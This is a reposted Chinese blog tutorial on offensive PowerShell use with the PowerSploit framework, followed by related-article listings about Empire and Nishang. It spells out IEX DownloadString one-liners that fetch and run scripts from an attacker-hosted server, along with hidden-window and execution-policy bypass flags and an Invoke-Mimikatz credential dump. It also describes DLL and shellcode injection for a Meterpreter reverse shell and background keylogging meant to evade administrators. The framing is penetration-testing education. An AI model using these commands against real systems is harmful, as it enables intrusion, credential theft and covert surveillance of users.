渗透利器之Powershell

最新推荐文章于 2024-08-29 14:09:51 发布
最新推荐文章于 2024-08-29 14:09:51 发布
阅读量2k 收藏 11
点赞数 1
分类专栏: 渗透测试

https://i-blog.csdnimg.cn/blog_migrate/6a196a2bb293e35e13b05e4e971dbf5b.png

前言

Powershell是Microsoft Windows命令行shell程序和脚本环境,它提供了令人难以置信的灵活性和功能来管理Windows系统,现在Windows系统上基本上都有它的存在。正因为它的强大,才能被我们所利用,帮助我们进行渗透测试。


Powershell的优秀之处

1. 代码运行在内存中可以不去接触磁盘

2. 从另一个系统中下载代码并执行

3. 很多安全产品并不能监测到powershell的活动

4. cmd.exe通常被阻止运行,但是powershell不会。


各个Windows下powershell版本

https://i-blog.csdnimg.cn/blog_migrate/8ddce343b092d2021980899de8378901.png


Powershell运行选项

以下介绍了渗透测试过程中我们经常要使用到的powershell运行选项

1
2
-WindowsStyle Hidden 隐藏自己的窗口
-ExecutionPolicy Bypass 绕过策略

Powershell脚本默认情况下无法在cmd下或双击执行,这时我们就可以使用这个选项绕过。


PowerSploit

PowerSploit是GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。

项目地址:https://github.com/PowerShellMafia/PowerSploit

一、代码执行(CodeExecution)

1. Invoke-DllInjection 

2. Invoke-ReflectivePEInjection

3. Invoke-Shellcode

4. Invoke-WmiCommand

二、脚本修改(ScriptModification)

1. Out-EncodedCommand

2. Out-CompressedDll

3. Out-EncryptedScript

4. Remove-Comments

三、权限维持(Persistence)

1. New-UserPersistenceOption

2. New-ElevatedPersistenceOption

3. Add-Persistence

4. Install-SSP

5. Get-SecurityPackages

四、绕过杀毒软件(AntivirusBypass)

Find-AVSignature

五、信息收集(Exfiltration)

这个文件夹主要是收集目标主机上的信息。

六、信息侦察(Recon)

这个文件夹主要是以目标主机为跳板进行内网主机侦察。


搭建PowerSploit脚本服务器

1. 下载PowerSploit到服务器

https://i-blog.csdnimg.cn/blog_migrate/05a201a573d710d9ded4a378d79d4bc9.png

2. 启动Apache

https://i-blog.csdnimg.cn/blog_migrate/80a62965a8c7808ab928d13c6911c587.png

3. 查看是否成功搭建

https://i-blog.csdnimg.cn/blog_migrate/bddaa4da79ce18c1deeaebbba8a45333.png


实战运用

由于篇幅问题,我们不可能针对每一个脚本都进行详细的介绍,所以这里我们来介绍一下实战中最常用到的脚本。

IEX远程下载脚本执行:

1
IEX(New-Object Net.WebClient).DownloadString(“脚本地址”)

获取Shell:

1.  Invoke-DllInjection

将DLL文件注入到当前进程中

我们首先来生成一个DLL反弹马

https://i-blog.csdnimg.cn/blog_migrate/f939087e3ae6b28829ea7ff6b332700f.png

在目标机上保存msf.dll到本地

https://i-blog.csdnimg.cn/blog_migrate/ec635881930bdac782bc3425e774e5c0.png

我们下载Invoke-DllInjection脚本

https://i-blog.csdnimg.cn/blog_migrate/6f37b8c8e85e449aa4410f07ebc78183.png

运行一个隐藏进程并注入DLL反弹木马

https://i-blog.csdnimg.cn/blog_migrate/ed24d0a1a421efcf80058565daa1f617.png

可以看见Meterpreter会话成功建立了

https://i-blog.csdnimg.cn/blog_migrate/e0a55c4e8667f672ebdd40b28feb2a6a.png

2. Invoke-Shellcode

在当前进程中注入Shellcode

Powershell调用Windows API非常方便,所以也可以直接来执行Shellcode。PowerSploit也提供了一些Shellcode,看下图:

https://i-blog.csdnimg.cn/blog_migrate/4225ee0b84e52d749d1c23d71dd969b4.png


扩大成果-内网端口扫描

1. 我们先下载Invoke-Portscan

https://i-blog.csdnimg.cn/blog_migrate/f33690b015457829efd62e2c1b0ac098.png

2. 结果

https://i-blog.csdnimg.cn/blog_migrate/9fac4a0279d68cefdd844c013b712db3.png


获取主机密码

为了不让管理员发现,我们不能再目标机上添加任何账户,这时候我们就需要来获取管理员密码来维持访问。这里我们就需要使用到脚本Invoke-Mimikatz,注意需要管理员权限。

1. 下载脚本

https://i-blog.csdnimg.cn/blog_migrate/a7c0c585c32a0ae0781f8cc2f55a57fe.png

2. dump密码

1
Invoke-Mimikatz –DumpCreds

https://i-blog.csdnimg.cn/blog_migrate/0ff9dff271ec1c3c017ea5f1e9d02c4d.png

再来一个大杀器-键盘记录

https://i-blog.csdnimg.cn/blog_migrate/0fa2d9a8efe2a43f3f1bd9cb6514d71a.png

这样它就进行键盘记录,不仅有键盘输入记录还有鼠标输入记录,而且还有很详细的时间,实战使用的时候,我们就要在放入后台运行。


漏洞探测-攻击进行时

下载脚本:

1
IEX(New-Object Net.WebClient).DownloadString("http://192.168.6.133/PowerSploit/Privesc/PowerUp.ps1")

Invoke-AllChecks:输出可识别的漏洞

https://i-blog.csdnimg.cn/blog_migrate/d6eae7b07b9685aa6cc8e3c029a138ec.png


自学指南-Get Help

脚本很多,很难一一介绍,剩下就要自己来尝试了,但是网上基本上找不到使用教程,所以就需要来获取帮助信息,来帮助自己学习。

比如Invoke-DllInjection

下载脚本:

1
IEX(New-Object Net.WebClient).DownloadString("http://192.168.6.133/PowerSploit/CodeExecution/Invoke-DllInjection.ps1")

获取帮助信息:

1
Get-Help Invoke-DllInjection

https://i-blog.csdnimg.cn/blog_migrate/1b8a9c6c784a37ed789b680e3e0e8575.png

查看事例:

1
Get-Help Invoke-DllInjection -Examples

https://i-blog.csdnimg.cn/blog_migrate/7b60409d247a44070f20d4be4a3f85ab.png

查看详细信息:

1
Get-Help Invoke-DllInjection –Detailed

https://i-blog.csdnimg.cn/blog_migrate/55cbae67c24cce2f4a6b3efcabecbace.png


结束语

Powershell实在是太强大了,可以说是内网渗透利器,继续深入研究,下一篇文章我们就不再是使用别人的脚本了,本篇文章的作用主要还是在于引导,大家还是要多用多练,才能在实践中灵活的运用。

 

原文地址:http://bobao.360.cn/learning/detail/3104.html

ntkkjjh
关注
专栏目录
PowerShell渗透--Empire
weixin_41082546的博客
10-25 567
0x00 简介 Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Meterpre...
[网络安全自学篇] 十九.Powershell基础入门及常见用法(一)
热门推荐
杨秀璋的专栏
10-28 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了XSS跨站脚本攻击,从原理、示例、危害到三种常见类型(反射型、存储型、DOM型),并结合代码示例进行详细讲解。这篇文章将讲解Powershell基础入门知识,包括常见的用法,涉及基础概念、管道和重定向、执行外部命令、别名用法、变量定义等。Powershell被广泛应用于安全领域,甚至成为每一位Web安全必须掌握的技术。
PowerShell脚本编写
最新发布
Chujun123528的博客
08-29 1252
PowerShell脚本在自动化Windows开发工作流程中发挥着重要作用。通过编写PowerShell脚本,开发者可以轻松地管理开发环境、依赖、编译、测试、部署以及CI/CD流程,从而提高开发效率,减少人为错误。随着PowerShell功能的不断完善和扩展,其在Windows开发领域的应用前景将更加广阔。
PowerShell渗透--Empire(二)
代码小牛的博客
10-25 211
权限提升 Bypass UAC usemodule powershell/privesc/bypassuac 设置listener execute list查看 usemodule powershell/private/bypassuac_wscript (win7) 当运行完提权模块后,back返回agents查看,多了一个提权成功带(*)号的agents usemodule po...
PowerShell渗透--Empire+Nishang(WEB安全攻防)
小英雄颂人头
03-04 1037
0xx1 empire Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Mete...
我眼中的基于powershell渗透测试工具nishang
ovowovo的博客
11-29 299
本文为学习笔记,仅限学习交流。 不得利用、从事危害国家或人民安全、荣誉和利益等活动。 请参阅《中华人民共和国网络安全法》 Nishang是一款针对PowerShell渗透工具。 先到github上去下载nishang,并解压 目标机下载nishang 地址:https://github.com/samratashok/nishang 攻击机下载icmpsh 地址:git clone https:...
Powershell攻击指南2——Empire
willow_liang的博客
12-05 1309
目录 Empire 1.介绍 2.安装 3.使用监听 4.生成木马 4.1 DLL木马 4.2 launcher 4.3 launcher_vbs木马 4.4 launcher_bat木马 4.5 Macro木马 4.6Ducky 连接主机及基本使用 1.查看已经连接的主机 2.interact命令连接主机 信息收集 Empire 1.介绍 Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成.
powershell 攻击中的应用.pdf
12-10
### PowerShell在攻击中的应用 ...综上所述,PowerShell的强大功能使其成为系统管理的利器,但也为攻击者提供了多样的攻击途径。了解这些执行策略及其绕过方法对于防御者来说至关重要,有助于加强系统的安全性。
渗透中的Powershell简单使用
03-28
powershell的简单使用。 一些脚本的开发 ,主要用于渗透
Metasploit新特性解读:渗透测试中的PowerShell利用
它是目前业界最为知名的渗透测试工具之一,具有强大的功能和灵活的扩展性。在本章中,我们将介绍Metasploit框架的概述、在渗透测试中的重要性以及它的发展历史。 ## 1.1 Metasploit框架概述 Metasploit框架由rapid...
powershell渗透基础
qq_46804551的博客
04-30 1319
一旦攻击者可以在一台计算机上运行代码,就会下载powershell脚本文件(.ps1)到磁盘中 执行,甚至无需写到磁盘中执行,它可以直接在内存中运行,利用诸多特点攻击者可以持续攻击而不被轻易发现。 常用的powershell攻击工具有以下几种: powerSploit: 常用于信息探测,权限提升,凭证窃取,持久化等操作 Nishang: 基于powershell渗透测试专用工具,集成了框架,脚本和各种payload,包含下载和执行,键盘记录,DNS,延时命令等脚本 Empire: 基于powe
利用powershell脚本进行内网渗透
h1825819493的博客
06-09 331
ps1是powershell脚本的拓展名,就相当于cmd的.bat脚本,但是他更加强大。
powershell渗透测试应该这么玩
focus on security
06-15 866
前言 Powershell 是 Microsoft Windows 命令行 shell 程序和脚本环境,它提供了令人难以置信的灵 活性和功能来管理 Windows 系统,现在 Windows 系统上基本上都有它的存在。正因为它的强大,才 能被我们所利用,帮助我们进行渗透测试。 Powershell 的优秀之处 1. 代码运行在内存中可以不去接触磁盘 2. 从另一个系统中下载代码并执行 3. 很多安全产品并不能监测到 powershell 的活动 4. cmd.exe 通常被阻止运行,但是 powershe
Powershell在内网渗透中的利用
纸房子
09-13 3652
Powershell作为CMD的增强版,因为其可以直接调用.Net及COM对象而实现许多CMD无法实现的功能,所以在Windows在使用Powershell成为了更多人的首选,同时也吸引了黑客,各种花式调用在内网渗透中。借鉴网上各种资料,记录总结一下。
渗透测试系列:Powershell渗透框架
weixin_54626591的博客
01-03 819
Powershell渗透框架
PowerShell渗透测试的使用浅析
weixin_45116657的博客
12-10 1449
目录 Windows PowerShell PowerShell的优点: 查看PowerShell版本 Powershell的简单使用 PowerShell的执行策略 绕过执行策略执行PowerShell脚本 PowerShell的常用文件类命令 PowerShell远程下载文件并执行 ​ 渗透测试常用的PowerShell命令 Windows PowerShell Win...
[网络安全自学篇] 二十.Powershell基础入门及常见用法(二)
杨秀璋的专栏
10-29 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Powershell基础入门知识,涉及基础概念、管道和重定向、执行外部命令、别名用法、变量定义等。这篇文章将从Powershell条件语句、循环语句、数组、函数 、字符串操作、注册表访问等方面讲解。Powershell被广泛应用于安全领域,甚至成为每一位Web安全必须掌握的技术。
PowerShell简介 及 渗透工具
prettyX的博客
12-31 586
0X00 内容 常见的PowerShell渗透工具 PowerShell简介 0X01 常见的PowerShell渗透工具 PowerSploit:这是众多PowerShell工具中被广泛使用的PowerShell后期漏洞利用框架,常用于信息探测、特权提升、凭证窃取、持久化等操作。 Nishang:基于PowerShell渗透测试专用工具,集成了框架、脚本和各种Payload,包含...
PowerOPS—PowerShell的移动渗透测试开发工具
SAKAISON的博客
08-24 1681
PowerOPS能够简化PowerShell的入侵测试流程。该工具包含多个PowerShell攻击模块,使用C#编写无需依赖powershell.exe,但需要在PowerShell运行空间环境(.NET)中执行PowerShell命令。 PowerOPS简化PowerShell使用流程及躲避杀毒检测的原理如下: 1.通过.NET 框架帮助GPO、SRP、App Locke
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值